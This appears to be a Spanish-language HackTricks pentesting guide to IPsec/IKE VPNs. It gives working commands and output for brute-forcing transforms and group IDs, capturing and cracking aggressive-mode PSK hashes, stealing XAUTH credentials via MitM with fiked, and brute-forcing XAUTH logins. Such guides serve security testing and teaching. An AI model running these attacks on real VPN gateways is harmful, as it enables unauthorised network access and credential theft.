19 KiB
500/udp - Pentesting IPsec/IKE VPN
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Try Hard Security Group
{% embed url="https://discord.gg/tryhardsecurity" %}
Información Básica
IPsec es ampliamente reconocido como la principal tecnología para asegurar las comunicaciones entre redes (LAN a LAN) y desde usuarios remotos hasta la puerta de enlace de la red (acceso remoto), sirviendo como la columna vertebral para soluciones de VPN empresariales.
El establecimiento de una asociación de seguridad (SA) entre dos puntos es gestionado por IKE, que opera bajo el paraguas de ISAKMP, un protocolo diseñado para la autenticación y el intercambio de claves. Este proceso se desarrolla en varias fases:
- Fase 1: Se crea un canal seguro entre dos puntos finales. Esto se logra mediante el uso de una Clave Precompartida (PSK) o certificados, empleando ya sea el modo principal, que implica tres pares de mensajes, o modo agresivo.
- Fase 1.5: Aunque no es obligatorio, esta fase, conocida como la Fase de Autenticación Extendida, verifica la identidad del usuario que intenta conectarse al requerir un nombre de usuario y una contraseña.
- Fase 2: Esta fase se dedica a negociar los parámetros para asegurar los datos con ESP y AH. Permite el uso de algoritmos diferentes a los de la Fase 1 para garantizar la Perfect Forward Secrecy (PFS), mejorando la seguridad.
Puerto por defecto: 500/udp
Descubrir el servicio usando nmap
root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT STATE SERVICE
500/udp open isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
Encontrar una transformación válida
La configuración de IPSec puede estar preparada solo para aceptar una o pocas transformaciones. Una transformación es una combinación de valores. Cada transformación contiene una serie de atributos como DES o 3DES como el algoritmo de cifrado, SHA o MD5 como el algoritmo de integridad, una clave precompartida como el tipo de autenticación, Diffie-Hellman 1 o 2 como el algoritmo de distribución de claves y 28800 segundos como la vida útil.
Entonces, lo primero que tienes que hacer es encontrar una transformación válida, para que el servidor hable contigo. Para hacerlo, puedes usar la herramienta ike-scan. Por defecto, Ike-scan funciona en modo principal y envía un paquete a la puerta de enlace con un encabezado ISAKMP y una única propuesta con ocho transformaciones dentro de ella.
Dependiendo de la respuesta, puedes obtener información sobre el punto final:
root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
Como puedes ver en la respuesta anterior, hay un campo llamado AUTH con el valor PSK. Esto significa que el vpn está configurado utilizando una clave precompartida (y esto es realmente bueno para un pentester).
El valor de la última línea también es muy importante:
- 0 returned handshake; 0 returned notify: Esto significa que el objetivo no es una puerta de enlace IPsec.
- 1 returned handshake; 0 returned notify: Esto significa que el objetivo está configurado para IPsec y está dispuesto a realizar la negociación IKE, y uno o más de los transformaciones que propusiste son aceptables (una transformación válida se mostrará en la salida).
- 0 returned handshake; 1 returned notify: Las puertas de enlace VPN responden con un mensaje de notificación cuando ninguna de las transformaciones es aceptable (aunque algunas puertas de enlace no lo hacen, en cuyo caso se debe intentar un análisis adicional y una propuesta revisada).
Entonces, en este caso ya tenemos una transformación válida, pero si estás en el 3er caso, entonces necesitas forzar un poco para encontrar una transformación válida:
Primero que todo, necesitas crear todas las transformaciones posibles:
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done
Y luego fuerza bruta cada uno usando ike-scan (esto puede tardar varios minutos):
while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M $line <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
Si el ataque de fuerza bruta no funcionó, tal vez el servidor esté respondiendo sin handshakes incluso a transformaciones válidas. Entonces, podrías intentar el mismo ataque de fuerza bruta pero utilizando el modo agresivo:
while read line; do (echo "Valid trans found: $line" && ike-scan -M --aggressive -P handshake.txt $line <IP>) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
Esperemos que una transformación válida sea devuelta.
Puedes intentar el mismo ataque usando iker.py.
También podrías intentar forzar transformaciones con ikeforce:
./ikeforce.py <IP> # No parameters are required for scan -h for additional help
En DH Group: 14 = 2048-bit MODP y 15 = 3072-bit
2 = HMAC-SHA = SHA1 (en este caso). El formato --trans
es $Enc,$Hash,$Auth,$DH
Cisco indica evitar el uso de los grupos DH 1 y 2 porque no son lo suficientemente fuertes. Los expertos creen que los países con muchos recursos pueden romper fácilmente la encriptación de datos que utilizan estos grupos débiles. Esto se hace utilizando un método especial que los prepara para descifrar los códigos rápidamente. Aunque cuesta mucho dinero establecer este método, permite a estos países poderosos leer los datos encriptados en tiempo real si están utilizando un grupo que no es fuerte (como 1,024-bit o menor).
Huella digital del servidor
Luego, puedes usar ike-scan para intentar descubrir el proveedor del dispositivo. La herramienta envía una propuesta inicial y deja de reproducir. Luego, analiza la diferencia de tiempo entre los mensajes recibidos del servidor y el patrón de respuesta correspondiente, el pentester puede identificar con éxito al proveedor de la puerta de enlace VPN. Además, algunos servidores VPN utilizarán la carga útil opcional de Vendor ID (VID) con IKE.
Especifica la transformación válida si es necesario (usando --trans)
Si IKE descubre quién es el proveedor, lo imprimirá:
root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
IKE Backoff Patterns:
IP Address No. Recv time Delta Time
172.16.21.200 1 1322286031.744904 0.000000
172.16.21.200 2 1322286039.745081 8.000177
172.16.21.200 3 1322286047.745989 8.000908
172.16.21.200 4 1322286055.746972 8.000983
172.16.21.200 Implementation guess: Cisco VPN Concentrator
Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
Esto también se puede lograr con el script de nmap ike-version
Encontrar el ID correcto (nombre del grupo)
Para poder capturar el hash, necesitas una transformación válida que soporte el modo agresivo y el ID correcto (nombre del grupo). Probablemente no conocerás el nombre del grupo válido, así que tendrás que forzarlo por fuerza bruta.
Para hacerlo, te recomendaría 2 métodos:
Fuerza bruta del ID con ike-scan
Primero que nada, intenta hacer una solicitud con un ID falso tratando de recopilar el hash ("-P"):
ike-scan -P -M -A -n fakeID <IP>
Si no se devuelve ningún hash, entonces probablemente este método de fuerza bruta funcionará. Si se devuelve algún hash, esto significa que se enviará un hash falso para una ID falsa, por lo que este método no será confiable para forzar la ID. Por ejemplo, podría devolverse un hash falso (esto ocurre en versiones modernas):
Pero si, como he dicho, no se devuelve ningún hash, entonces deberías intentar forzar nombres de grupo comunes usando ike-scan.
Este script intentaré forzar posibles IDs y devolverá las IDs donde se devuelve un apretón de manos válido (este será un nombre de grupo válido).
Si has descubierto una transformación específica, agrégala en el comando ike-scan. Y si has descubierto varias transformaciones, siéntete libre de agregar un nuevo bucle para probarlas todas (deberías probarlas todas hasta que una de ellas funcione correctamente).
Puedes usar el diccionario de ikeforce o el de seclists de nombres de grupo comunes para forzarlos:
while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n $line <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
Or use this dict (es una combinación de los otros 2 dicts sin repeticiones):
{% file src="../.gitbook/assets/vpnIDs.txt" %}
Bruteforcing ID con Iker
iker.py también utiliza ike-scan para bruteforcear posibles nombres de grupo. Sigue su propio método para encontrar un ID válido basado en la salida de ike-scan.
Bruteforcing ID con ikeforce
ikeforce.py es una herramienta que se puede usar para bruteforcear IDs también. Esta herramienta intenta explotar diferentes vulnerabilidades que podrían usarse para distinguir entre un ID válido y un ID no válido (podría tener falsos positivos y falsos negativos, por eso prefiero usar el método ike-scan si es posible).
Por defecto, ikeforce enviará al principio algunos IDs aleatorios para verificar el comportamiento del servidor y determinar la táctica a usar.
- El primer método es bruteforcear los nombres de grupo buscando la información Dead Peer Detection DPD de los sistemas Cisco (esta información solo es respondida por el servidor si el nombre del grupo es correcto).
- El segundo método disponible es verificar el número de respuestas enviadas a cada intento porque a veces se envían más paquetes cuando se usa el ID correcto.
- El tercer método consiste en buscar "INVALID-ID-INFORMATION" en respuesta a un ID incorrecto.
- Finalmente, si el servidor no responde nada a las verificaciones, ikeforce intentará bruteforcear el servidor y verificar si cuando se envía el ID correcto, el servidor responde con algún paquete.
Obviamente, el objetivo de bruteforcear el ID es obtener el PSK cuando tienes un ID válido. Luego, con el ID y el PSK tendrás que bruteforcear el XAUTH (si está habilitado).
Si has descubierto una transformación específica, añádela en el comando de ikeforce. Y si has descubierto varias transformaciones, siéntete libre de agregar un nuevo bucle para probarlas todas (deberías probarlas todas hasta que una de ellas funcione correctamente).
git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
./ikeforce.py <IP> -e -w ./wordlists/groupnames.dic
Sniffing ID
(Del libro Network Security Assessment: Know Your Network): También es posible obtener nombres de usuario válidos al esnifar la conexión entre el cliente VPN y el servidor, ya que el primer paquete del modo agresivo que contiene el ID del cliente se envía en claro.
Capturing & cracking the hash
Finalmente, si has encontrado una transformación válida y el nombre del grupo y si se permite el modo agresivo, entonces puedes capturar muy fácilmente el hash que se puede romper:
ike-scan -M -A -n <ID> --pskcrack=hash.txt <IP> #If aggressive mode is supported and you know the id, you can get the hash of the passwor
El hash se guardará dentro de hash.txt.
Puedes usar psk-crack, john (usando ikescan2john.py) y hashcat para crackear el hash:
psk-crack -d <Wordlist_path> psk.txt
XAuth
El modo agresivo IKE combinado con una clave precompartida (PSK) se emplea comúnmente para autenticación de grupo. Este método se complementa con XAuth (Autenticación Extendida), que sirve para introducir una capa adicional de autenticación de usuario. Tal autenticación típicamente aprovecha servicios como Microsoft Active Directory, RADIUS o sistemas comparables.
Al pasar a IKEv2, se observa un cambio notable donde se utiliza EAP (Protocolo de Autenticación Extensible) en lugar de XAuth con el propósito de autenticar usuarios. Este cambio subraya una evolución en las prácticas de autenticación dentro de los protocolos de comunicación segura.
Captura de credenciales MitM en la red local
Así puedes capturar los datos del inicio de sesión usando fiked y ver si hay algún nombre de usuario predeterminado (Necesitas redirigir el tráfico IKE a fiked
para el sniffing, lo cual se puede hacer con la ayuda de ARP spoofing, más info). Fiked actuará como un punto final de VPN y capturará las credenciales de XAuth:
fiked -g <IP> -k testgroup:secretkey -l output.txt -d
También, usando IPSec intenta realizar un ataque MitM y bloquear todo el tráfico al puerto 500, si el túnel IPSec no se puede establecer, tal vez el tráfico se enviará en claro.
Fuerza bruta del nombre de usuario y contraseña XAUTH con ikeforce
Para realizar fuerza bruta en el XAUTH (cuando conoces un nombre de grupo id válido y el psk) puedes usar un nombre de usuario o una lista de nombres de usuario y una lista de contraseñas:
./ikeforce.py <IP> -b -i <group_id> -u <username> -k <PSK> -w <passwords.txt> [-s 1]
De esta manera, ikeforce intentará conectarse utilizando cada combinación de nombre de usuario:contraseña.
Si encontraste una o varias transformaciones válidas, simplemente úsalas como en los pasos anteriores.
Autenticación con un VPN IPSEC
En Kali, VPNC se utiliza para establecer túneles IPsec. Los perfiles deben estar ubicados en el directorio /etc/vpnc/
. Puedes iniciar estos perfiles utilizando el comando vpnc.
Los siguientes comandos y configuraciones ilustran el proceso de configuración de una conexión VPN con VPNC:
root@system:~# cat > /etc/vpnc/samplevpn.conf << STOP
IPSec gateway [VPN_GATEWAY_IP]
IPSec ID [VPN_CONNECTION_ID]
IPSec secret [VPN_GROUP_SECRET]
IKE Authmode psk
Xauth username [VPN_USERNAME]
Xauth password [VPN_PASSWORD]
STOP
root@system:~# vpnc samplevpn
VPNC started in background (pid: [PID])...
root@system:~# ifconfig tun0
En esta configuración:
- Reemplace
[VPN_GATEWAY_IP]
con la dirección IP real del gateway VPN. - Reemplace
[VPN_CONNECTION_ID]
con el identificador de la conexión VPN. - Reemplace
[VPN_GROUP_SECRET]
con el secreto del grupo de la VPN. - Reemplace
[VPN_USERNAME]
y[VPN_PASSWORD]
con las credenciales de autenticación de la VPN. [PID]
simboliza el ID del proceso que se asignará cuandovpnc
inicie.
Asegúrese de que se utilicen valores reales y seguros para reemplazar los marcadores de posición al configurar la VPN.
Material de Referencia
- PSK cracking paper
- SecurityFocus Infocus
- Scanning a VPN Implementation
- Network Security Assessment 3rd Edition
Shodan
port:500 IKE
Try Hard Security Group
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.